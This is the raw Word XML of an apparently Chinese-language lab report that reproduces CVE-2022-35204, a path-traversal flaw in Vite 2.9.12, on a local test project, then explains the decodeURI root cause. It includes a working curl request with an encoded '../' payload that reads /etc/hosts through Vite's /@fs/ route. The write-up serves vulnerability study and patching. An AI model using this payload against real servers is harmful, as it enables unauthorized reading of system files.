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漏洞详情信息表"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞详情信息表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞名称：Vite 路径遍历漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CNNVD 编号：CNNVD-202208-3372</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE 编号：CVE-2022-35204</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">厂商：Vite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">危害等级：低危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞类型：路径遍历</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">收录时间：2022-08-18 00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">更新时间：2022-08-22 00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vite 是 Vite 开源的一种新型的前端构建工具。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vite v2.9.13 之前版本存在安全漏洞，该漏洞源于允许攻击者通过精心设计的 URL 对受害者的服务执行目录遍历。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="系统和软件环境配置详情信息表"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">系统和软件环境配置详情信息表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">操作系统：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Arch Linux (6.3.3-zen1-1-zen)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">软件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">node v20.2.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">yarn v1.22.19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vite v2.9.12</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="45" w:name="漏洞还原详细步骤"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞还原详细步骤</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="新建环境"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. 新建环境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mkdir CVE-2022-35204</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">指令新建目录用于测试。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init</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">创建新的 nodejs 项目。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add vite@2.9.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">安装带有缺陷的 vite 版本。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="编写代码"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. 编写代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">创建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，简单写入任意 HTML 页面，如下样例。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charset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http-equiv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"X-UA-Compatible"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Vite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There is nothing to observe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bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="30" w:name="运行程序"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. 运行程序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vite dev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">开启 vite 开发模式服务器，可以看到程序默认监听了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost:3000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">地址端口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4019550" cy="20288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figure/fig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访问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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">可以看到我们在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中编写的内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3619500" cy="16192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figure/fi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0" w:name="验证漏洞"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. 验证漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vite 默认启用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/@fs/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">路由用于访问任意本地文件，但是只限于项目仓库目录下的文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">例如我们构造一个请求 URL 形如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:3000/@fs/home/swwind/tmp/cve/CVE-2022-35204/index.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，这个 URL 指向的是我们方才创建的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，并且在项目的目录下，因此可以正常访问。我们使用 curl 测试这个路径的访问情况。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http://localhost:3000/@fs/home/swwind/tmp/cve/CVE-2022-35204/index.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">程序输出如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="180510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figure/fi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我们尝试访问一个不在项目路径下的文件，例如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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">文件，可以看到 vite 拒绝了我们的请求。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http://localhost:3000/@fs/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="129115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figure/fi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漏洞的关键在于，我们可以使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e%2f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">（经过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">encodeURIComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">之后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">）来索引到父级目录，从而绕过 vite 的路径验证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">值得注意的是使用 curl 必须要带上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--path-as-is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">参数，防止 curl 自己展开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../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curl --path-as-is http://localhost:3000/@fs/home/swwind/tmp/cve/CVE-2022-35204/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="174306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/figur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可以看到成功绕过了 vite 的路径检测，成功访问到了系统中的任意文件。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="44" w:name="漏洞分析"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. 漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞出现的原因在于 vite 错误地使用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">decodeURI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数来对输入的参数进行反序列化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2811422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ure/fi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decodeURI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数在解码时会将大部分 ASCII 标点符号和预留字符保留不变，包括 /（斜杠）和 %2f（斜杠的编码形式）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">相比之下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">decodeURIComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数仅解码 URI 组件中的字符，而不是完整的 URI。它可以正确解码任何 ASCII 字符或 UTF-8 字符集，包括默认 URI 编码中使用的所有预留字符和其他特殊字符。因此，在处理普通的、标准的或非标准的 URI 时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">decodeURIComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数通常是更安全和可靠的选择。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">在这个漏洞的情形下，当传入的参数是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/swwind/tmp/cve/CVE-2022-35204/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">的情形下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">decodeURI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数解析出来的结果是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/swwind/tmp/cve/CVE-2022-35204/..%2f..%2f..%2f..%2f../etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，再经由下一步的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">path.resolve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数解析的最终结果是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/swwind/tmp/cve/CVE-2022-35204/..%2f..%2f..%2f..%2f../etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，非常轻松地就绕过了 vite 的允许目录检查。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">相比之下，如果使用了安全的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">decodeURIComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数，那么第一步解析出来的结果就会是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/swwind/tmp/cve/CVE-2022-35204/../../../../../etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，经过第二步</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">path.resolve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">解析之后的结果将会是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，从而有效防止此类攻击。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2023-05-29T11:25:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-29T11:25:31Z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